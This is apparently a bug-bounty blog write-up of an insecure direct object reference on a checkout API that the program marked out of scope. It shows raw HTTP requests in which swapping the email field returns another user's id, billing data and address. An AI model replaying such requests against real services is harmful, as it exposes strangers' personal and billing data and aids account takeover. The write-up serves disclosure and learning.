(Out of Scope)-IDOR allows access to billing data and address of any user.

Hey fellow hackers and bug hunters,

Here, I am going to tell you about the critical IDOR which leads to disclose the billing info and address of other user’s.

Note : This was marked as out of scope

This was an Bugcrowd program for example ( test.com ) . One fine day,not a fine day , Its a shit day.On that day i reported 5 vulnerabilities to that program 4-p4 and 1-p5 all the 5 were marked as duplicate and Not Appplicable.

After that i can’t able to find flaw’s because the application doesn’t have much functionalities.After so many hours,I accidentally checked the burp history, In that i found a interesting API POST request

Request :

POST /checkout/api/user HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://test.com/checkout/?promotionId=bs-monthlybasic-a
Content-Type: application/json
Origin: https://test.com
Content-Length: 69
Connection: close
Cookie: cookies

{"email":"mkraviram476@gmail.com","trackingId":"1713566751076497959"}

Here is the request i found via burp history, I thought what should happen if i changed the email to another email , Quickly i created another account in the test.com with another email.Then i changed the request to

POST /checkout/api/user HTTP/1.1
Host: test.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://test.com/checkout/?promotionId=bs-monthlybasic-a
Content-Type: application/json
Origin: https://test.com
Content-Length: 69
Connection: close
Cookie: cookies

{"email":"ramthewhitehat@gmail.com","trackingId":"1713566751076497959"}

BOOM !!, It returns the userid which used in password reset functionalities,and returns billing info and addresses.

The response :

HTTP/1.1 200 OK
Date: Thu, 14 Oct 2021 11:13:53 GMT
Content-Type: application/json; charset=utf-8
Connection: close
x-powered-by: Express
CF-Cache-Status: DYNAMIC
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=%2FX5Vm1tTNsHTuAxqU8SkEjiOhjzjMD4yvkeqhi38Q3HpJoRfYY5Jj9OQmAY5unndcmReXX3fOyGRSEigWuxHOoB3qc9udXhxq%2FjaIAskP3GTJnGE8JVj6MXKkp6QNs5hiPlzQQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 69e0617eb899de6e-BOM
alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
Content-Length: 147

{"id":"f1e07585-db6f-4709-bf8e-38f433e7c9fe","billingTransactions":[],"contracts":[],"products":[],"state":"activated","devices":[],"address":null}

I am so happy with this finding,but they marked it as out of scope!!

I’m depressed

Never give up on a dream just because of the time it will take to accomplish it. The time will pass anyway.

Follow me on Instagram : https://www.instagram.com/ram_0x_infosec/

Connect with me on Linkedin : https://www.linkedin.com/in/ram0xinfosec/

Thanks for reading this writeup!!!..Lot more to come!!…